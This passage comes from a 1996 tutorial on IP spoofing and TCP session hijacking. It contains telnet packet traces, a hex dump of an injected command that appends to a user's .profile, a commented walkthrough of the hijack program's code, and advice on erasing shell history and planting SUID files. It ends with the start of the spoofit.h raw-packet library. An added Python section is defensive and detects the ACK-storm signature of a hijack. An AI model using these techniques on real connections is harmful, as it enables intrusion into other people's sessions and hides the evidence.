ip-spoof.txt
people ignore this and re-login after a few secs, accepting the accident as
Murphy's law. (Well it *can* happen without any spoofing involved)

TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
   SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
   FLAGS: -AP---   Window: 7C00
   (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
   SEQ (hex): C34A680B   ACK (hex): 5C8223F5
   FLAGS: -A----   Window: 2238
   (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23
   SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
   FLAGS: -AP---   Window: 7C00
   (data removed because irrelevant)
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
   SEQ (hex): C34A680B   ACK (hex): 5C8223F5
   FLAGS: -A----   Window: 2238
   (data removed because irrelevant)

7) We are back on track (or at least hijack is, because this is going very
   fast). And we fire off our faked bash command.
      echo "echo HACKED" >> $HOME/.profile<ENTER>

TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
   SEQ (hex): 5C8223F5   ACK (hex): C34A680B
   FLAGS: -AP---   Window: 7C00
Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23
 45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E
 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J
 68 h 0B . 50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20
 22 " 65 e 63 c 68 h 6F o 20   48 H 41 A 43 C 4B K 45 E 44 D 22 " 20   3E >
 3E > 24 $ 48 H 4F O 4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e
 0A . 00 .

8) Now we wait for this data to be confirmed.
      ACK = 5C8223F5 + 025 (=37 bytes)

TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
   SEQ (hex): C34A680B   ACK (hex): 5C82241A
   FLAGS: -AP---   Window: 2238
Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040
   (data removed because irrelevant)

9) The connection runs on. Now you can execute more commands (just stay on
   track of SEQ/ACK), and even finish the connection (with the same
   mechanism as sniper, or with sniper itself... here FIN is recommended).

   NOTE: here it is important to be in a shell. But if you have been
         watching someone, and you notice he's always directly going to
         'pine' and you can't get in between in time: NO PROBS.... just
         make a cleanup string that cleans up 'pine' and puts you back in
         the shell. (some control chars, hotkeys, whatever....)
   NOTE: if you clean up the .sh_history or .bash_history (whatever) this
         attack is one of the nicest there is. Another advantage over
         sniffing.
   NOTE: No one says you have to make a .rhosts file (rlogin and family
         might be disabled), you can change permissions, put stuff SUID,
         put it public, install stuff, mail, etc..

Discussion of the program (numbers correspond with those of 'An Actual
Attack'):

1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);

   Waiting for actual data (PSH is always used for packets containing data
   in interactive services like TELNET)

2) N/A

3) N/A

4) sp_seq=attack_info.seq+attack_info.datalen;
   sp_ack=attack_info.ack;
   transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P,
                SERVER, 23,sp_seq,sp_ack,ACK|PSH);

   We recalculate the sequence number (using SEQ and datalength of packet 1)
   and we send a spoofed packet with ACK and PSH flag, containing the
   cleanup data in to_data.

5) while(count<5)
     {
     wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
     if(attack_info.ack==sp_seq+sizeof(to_data))
       count=PERSONAL_TOUCH;
     else count++;
     };

   We wait for a confirmation that our spoofed sequence is accepted. We
   expect a packet with an ACK set (PSH or not). It should come within 5
   packets; we use this limit because we should be able to handle some
   previous ACK packets!
   NOTE we don't check SEQ nrs, because we have no clue of what they are
   going to be (data might have been sent our way, or not).

6) while(count<10)
     {
     old_seq=serv_seq;
     old_ack=serv_ack;
     wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0);
     if(attack_info.datalen==0)
       {
       serv_seq=attack_info.seq+attack_info.datalen;
       serv_ack=attack_info.ack;
       if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
         count=PERSONAL_TOUCH;
       else count++;
       }
     };

   To get back on track, we try to receive 2 ACK packets without data with
   the same SEQ/ACK. We know enough packets will be sent as a response to
   incorrect packets from the confused host A. This is how we get back on
   track.
   NOTE In a case where A completely gave up, simply spoof a packet with
   incorrect SEQ/ACK to get the correct numbers back.

7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P,
                SERVER,23,serv_ack,serv_seq,ACK|PSH);

   Pretty clear....

8) while(count<5)
     {
     wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
     if(attack_info.ack==serv_ack+sizeof(evil_data))
       count=PERSONAL_TOUCH;
     else count++;
     };

   and again waiting for confirmation.

NOTE after the above attack, hijack had produced the following output:

   Starting Hijacking demo - Brecht Claerhout 1996
   -----------------------------------------------
   Takeover phase 1: Stealing connection.
     Sending Spoofed clean-up data...
     Waiting for spoof to be confirmed...
   Phase 1 ended.

   Takeover phase 2: Getting on track with SEQ/ACK's again
     Server SEQ: C34A680B (hex)   ACK: 5C8223F5 (hex)
   Phase 2 ended.

   Takeover phase 3: Sending MY data.
     Sending evil data.
     Waiting for evil data to be confirmed...
   Phase 3 ended.

4.5 Other
---------

This list is far from complete, I'm sure you can think of other nice things
to do with this information, think, experiment and code!
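As an added example (not part of this text, nor of the hijack or spoofit code), the following Python script does two things a defender would want to do with the material in this section. First it parses the sniffit-style hex dump of the spoofed segment printed under step 7 of 'An Actual Attack' and verifies the IP and TCP checksums plus the SEQ/ACK arithmetic of step 8 (37 bytes of payload, so the server's next ACK is 5C82241A). Second it runs a small detector over "TCP Packet ID" trace lines for the on-the-wire signature that step 6 of the program discussion relies on: both ends repeating the same SEQ/ACK pair while neither acknowledgement advances. The dump is copied from the trace above; the trace sample is constructed from the lines above with the anonymised addresses used consistently; the function and field names are my own.

```python
import re
import struct
from collections import Counter

# Sniffit-style dump of the spoofed segment, copied from the trace above: each
# byte is followed by its printable character, or a dot when it has none.
SPOOFED_DUMP = r"""
45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E
3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J
68 h 0B . 50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20
22 " 65 e 63 c 68 h 6F o 20 48 H 41 A 43 C 4B K 45 E 44 D 22 " 20 3E >
3E > 24 $ 48 H 4F O 4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e
0A . 00 .
"""

# Constructed from the "TCP Packet ID" lines of the trace above, with the
# anonymised 166.66.66.1 / 111.11.11.11 addresses used for every line.
TRACE = """
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238
TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223F5 ACK (hex): C34A680B FLAGS: -AP--- Window: 7C00
TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C82241A FLAGS: -AP--- Window: 2238
"""

# Sniffit prints the flags in the order URG, ACK, PSH, RST, SYN, FIN.
FLAG_ORDER = (("U", 0x20), ("A", 0x10), ("P", 0x08), ("R", 0x04), ("S", 0x02), ("F", 0x01))
TRACE_RE = re.compile(
    r"TCP Packet ID \(from_IP\.port-to_IP\.port\): "
    r"(\d+\.\d+\.\d+\.\d+)\.(\d+)-(\d+\.\d+\.\d+\.\d+)\.(\d+)"
    r"\s+SEQ \(hex\): ([0-9A-Fa-f]+)\s+ACK \(hex\): ([0-9A-Fa-f]+)\s+FLAGS: (\S+)")

def parse_dump(dump):
    """Keep only the two-digit hex tokens; the printable characters and dots are dropped."""
    return bytes(int(t, 16) for t in dump.split() if re.fullmatch(r"[0-9A-Fa-f]{2}", t))

def inet_checksum(data):
    """RFC 1071 one's-complement checksum; an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def parse_ip_tcp(pkt):
    """Decode an IPv4/TCP segment and verify both checksums."""
    ihl = (pkt[0] & 0x0F) * 4
    pkt = pkt[:struct.unpack("!H", pkt[2:4])[0]]   # drop dump padding past the IP total length
    ip_hdr, tcp = pkt[:ihl], pkt[ihl:]
    stored_ip = struct.unpack("!H", ip_hdr[10:12])[0]
    sport, dport, seq, ack = struct.unpack("!HHII", tcp[:12])
    doff, flags = (tcp[12] >> 4) * 4, tcp[13]
    window, stored_tcp = struct.unpack("!HH", tcp[14:18])
    # The TCP checksum covers a pseudo-header (src, dst, zero, protocol, TCP
    # length), then the TCP header with its checksum field zeroed, then the data.
    pseudo = ip_hdr[12:20] + struct.pack("!BBH", 0, ip_hdr[9], len(tcp))
    return {
        "src": ".".join(map(str, ip_hdr[12:16])), "sport": sport,
        "dst": ".".join(map(str, ip_hdr[16:20])), "dport": dport,
        "seq": seq, "ack": ack, "window": window, "payload": tcp[doff:],
        "flags": "".join(n if flags & b else "-" for n, b in FLAG_ORDER),
        "ip_csum_ok": inet_checksum(ip_hdr[:10] + b"\x00\x00" + ip_hdr[12:]) == stored_ip,
        "tcp_csum_ok": inet_checksum(pseudo + tcp[:16] + b"\x00\x00" + tcp[18:]) == stored_tcp,
    }

def parse_trace(text):
    """Turn sniffit 'TCP Packet ID' lines into segment dicts (hex SEQ/ACK become ints)."""
    return [{"src": f"{m[1]}:{m[2]}", "dst": f"{m[3]}:{m[4]}",
             "seq": int(m[5], 16), "ack": int(m[6], 16), "flags": m[7]}
            for m in TRACE_RE.finditer(text)]

def seq_diff(a, b):
    """Signed distance a - b in 32-bit sequence space."""
    d = (a - b) & 0xFFFFFFFF
    return d - (1 << 32) if d & 0x80000000 else d

def find_desync(segs, span=4):
    """Flag the hijack signature: within `span` consecutive segments each side
    repeats one (SEQ, ACK) pair and neither acknowledgement moves.  For every
    hit, report per sender the gap between its SEQ and the ACK its peer keeps
    sending: positive means the peer has acknowledged bytes this sender never
    transmitted (injected data), negative means the sender is ahead of what
    the peer will accept."""
    findings = []
    for i in range(len(segs) - span + 1):
        chunk = segs[i:i + span]
        counts = Counter((s["src"], s["seq"], s["ack"]) for s in chunk)
        by_sender = {s["src"]: s for s in chunk}
        if len(counts) != 2 or min(counts.values()) < 2 or len(by_sender) != 2:
            continue
        if any(s["dst"] not in by_sender for s in chunk):
            continue                                  # not a single two-way flow
        gaps = {me: seq_diff(by_sender[s["dst"]]["ack"], s["seq"]) for me, s in by_sender.items()}
        findings.append({"first_index": i, "gaps": gaps})
    return findings

if __name__ == "__main__":
    seg = parse_ip_tcp(parse_dump(SPOOFED_DUMP))
    print(f"{seg['src']}:{seg['sport']} -> {seg['dst']}:{seg['dport']}  flags {seg['flags']}")
    print(f"IP checksum ok: {seg['ip_csum_ok']}   TCP checksum ok: {seg['tcp_csum_ok']}")
    print(f"payload ({len(seg['payload'])} bytes): {seg['payload']!r}")
    print(f"expected next ACK from server: {seg['seq'] + len(seg['payload']):08X}")
    for hit in find_desync(parse_trace(TRACE)):
        print(f"ACK storm from segment {hit['first_index']}: SEQ/ACK gaps {hit['gaps']}")
```

Run as a script it prints the decoded fields of the dumped segment (both checksums verify, so the dump is a faithful record of what went on the wire) and one finding for the first four trace lines. The positive gap of 10 bytes reported for the client is the amount of data the server has acknowledged that the client never sent (the injected cleanup string), and the negative gap of 20 bytes for the server is the server output the client keeps refusing to acknowledge. On a real capture, feed parse_trace() the sniffit output and alert on any find_desync() hit; loss-driven retransmission rarely produces lockstep repeats from both directions at once, so the pattern is a strong indicator that a third party has stepped into the session.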
5. The source code
------------------

=[ spoofit.h ]=-------------------------------------------------------------

/**************************************************************************/
/* Spoofit.h - Include file for easy creating of spoofed TCP packets      */
/*             Requires LINUX 1.3.x (or later) Kernel                     */
/*             (illustration for 'A short overview of IP spoofing')       */
/*             V.1 - Copyright 1996 - Brecht Claerhout                    */
/*                                                                        */
/* Purpose - Providing skilled people with an easy-to-use spoofing source */
/*           I used it to be able to write my tools fast and short.       */
/*           Mind you this is only illustrative and can be easily         */
/*           optimised.                                                   */
/*                                                                        */
/* Author - Brecht Claerhout <Coder@reptile.rug.ac.be>                    */
/*          Serious advice, comments, statements, greets, always welcome  */
/*          flames, moronic 3l33t >/dev/null                              */
/*                                                                        */
/* Disclaimer - This file is for educational purposes only. I am in       */
/*              NO way responsible for what you do with this file,        */
/*              or any damage you or this file causes.                    */
/*                                                                        */
/* For whom - People with a little knowledge of TCP/IP, C source code     */
/*            and general UNIX. Otherwise, please keep your hands off,    */
/*            and catch up on those things first.                         */
/*                                                                        */
/* Limited to - Linux 1.3.X or higher.                                    */
/*              If you know a little about your OS, shouldn't be too hard */
/*              to port.                                                  */
/*                                                                        */
/* Important note - You might have noticed I use non standard packet      */
/*                  header structs. How come?? Because I started like     */
/*                  that on Sniffit because I wanted to do the            */
/*                  bittransforms myself.                                 */
/*                  Well I got so damned used to them, I keep using them, */
/*                  they are not very different, and not hard to use, so  */
/*                  you'll easily use my structs without any problem,     */
/*                  this code and the examples show how to use them.      */
/*                  my apologies for this inconvenience.                  */
/*                                                                        */
/* None of this code can be used in commercial software. You are free to  */
/* use it in any other non-commercial software (modified or not) as long  */
/* as you give me the credits for it. You can spread this include file,   */
/* but keep it unmodified.                                                */
/*                                                                        */
/**************************************************************************/
/*                                                                        */
/* Easiest way to understand this library is to look at the use of it, in */
/* the example progs.                                                     */
/*                                                                        */
/**** Sending packets *****************************************************/
/*                                                                        */
/* int open_sending (void)                                                */
/*     Returns a filedescriptor to the sending socket.                    */
/*     close it with close (int filedesc)                                 */
/*                                                                        */
/* void transmit_TCP (int sp_fd, char *sp_data,                           */
/*                    int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,  */
/*                    char *sp_source, unsigned short sp_source_port,     */
/*                    char *sp_dest, unsigned short sp_dest_port,         */
/*                    unsigned long sp_seq, unsigned long sp_ack,         */
/*                    unsigned short sp_flags)                            */
/*     fire data away in a TCP packet                                     */
/*     sp_fd         : raw socket filedesc.                               */
/*     sp_data       : IP options (you should do the padding)             */
/*                     TCP options (you should do the padding)            */
/*                     data to be transmitted                             */
/*                     (NULL is nothing)                                  */
/*                     note that all is optional, and IP and TCP options  */
/*                     are not often used.                                */
/*                     All data is put after each other in one buffer.    */
/*     sp_ipoptlen   : length of IP options (in bytes)                    */
/*     sp_tcpoptlen  : length of TCP options (in bytes)                   */
/*     sp_datalen    : amount of data to be transmitted (bytes)           */
/*     sp_source     : spoofed host that "sends packet"                   */
/*     sp_source_port: spoofed port that "sends packet"                   */
/*     sp_dest       : host that should receive packet                    */
/*     sp_dest_port  : port that should receive packet                    */
/*     sp_seq        : sequence number of packet                          */
/*     sp_ack        : ACK of packet                                      */
/*     sp_flags      : flags of packet (URG,ACK,PSH,RST,SYN,FIN)          */
/*                                                                        */
/* void transmit_UDP (int sp_fd, char *sp_data,                           */
/*                    int sp_ipoptlen, int sp_datalen,                    */
/*                    char *sp_source, unsigned short sp_source_port,     */
/*                    char *sp_dest, unsigned short sp_dest_port)         */
/*     fire data away in a UDP packet                                     */
/*     sp_fd         : raw socket filedesc.                               */
/*     sp_data       : IP options                                         */
/*                     data to be transmitted                             */
/*                     (NULL if none)                                     */
/*     sp_ipoptlen   : length of IP options (in bytes)                    */
/*     sp_datalen    : amount of data to be transmitted                   */
/*     sp_source     : spoofed host that "sends packet"                   */
/*     sp_source_port: spoofed port that "sends packet"                   */
/*     sp_dest       : host that should receive packet                    */
/*     sp_dest_port  : port that should receive packet                    */
/*                                                                        */
/**** Receiving packets ***************************************************/
/*                                                                        */
/* int open_receiving (char *rc_device, char mode)                        */
/*     Returns fdesc to a receiving socket                                */
/*     (if mode: IO_HANDLE don't call this twice, global var              */
/*      rc_fd_abc123 is initialised)                                      */
/*     rc_device: the device to use e.g. "eth0", "ppp0"                   */
/*                be sure to change DEV_PREFIX accordingly!               */
/*                DEV_PREFIX is the length in bytes of the header that    */
/*                comes with a SOCKET_PACKET due to the network device    */
/*     mode: 0: normal mode, blocking, (read will wait till packet        */
/*              comes, mind you, we are in PROMISC mode)                  */
/*           IO_NONBLOCK: non-blocking mode (read will not wait till      */
/*              useful for active polling)                                */
/*           IO_HANDLE installs the signal handler that updates SEQ,ACK,..*/
/*              (IO_HANDLE is not recommended to use, as it should be     */
/*              modified according to own use, and it works badly on heavy*/
/*              traffic continuous monitoring. I needed it once, but      */
/*              left it in to make you able to have a look at Signal      */
/*              handled IO, personally I would have removed it, but some  */
/*              thought it doesn't do any harm anyway, so why remove... ) */
/*              (I'm not giving any more info on IO_HANDLE as it is not   */
/*              needed for the example programs, and interested people can*/
/*              easily figure the code out themselves.)                   */
/*              (Besides IO_HANDLE can only be called ONCE in a program,  */
/*              other modes multiple times)                               */
/*                                                                        */
/* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,           */
/*                 unsigned char *proto)                                  */
/*     This waits for a packet (mode default) and puts it in buffer or    */
/*     returns whether there is a packet or not (IO_NONBLOCK).            */
/*     It returns the packet length if there is one available, else 0     */
/*                                                                        */
/* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,           */
/*                 char *wp_source, unsigned short wp_source_port,        */
/*                 char *wp_dest, unsigned short wp_dest_port,            */
/*                 int wp_flags, int wait_time);                          */
/*     wp_fd: a receiving socket (default or IO_NONBLOCK)                 */
/*     ret_values: pointer to a sp_wait_packet struct, that contains SEQ, */
/*                 ACK, flags, datalen of that packet. For further packet */
/*                 handling see the examples.                             */
/*          struct sp_wait_packet {                                       */
/*                 unsigned long seq,ack;                                 */
/*                 unsigned short flags;                                  */
/*                 int datalen;                                           */
/*          };                                                            */
/*     wp_source, wp_source_port : sender of packet                       */
/*     wp_dest, wp_dest_port     : receiver of packet                     */
/*     wp_flags: flags that should be present in packet.. (mind you there */
/*               could be more present, so check on return)               */
/*               note: if you don't care about flag, use 0                */
/*     wait_time: if not zero, this function will return -1 if no correct */
/*                packet has arrived within wait_time secs.               */
/*                (only works on IO_NONBLOCK socket)                      */
/*                                                                        */
/* void set_filter (char *f_source, unsigned short f_source_port,         */
/*                  char *f_dest, unsigned short f_dest_port)             */
/*     (for use with IO_HANDLE)                                           */
/*     Start the program to watch all traffic from source/port to         */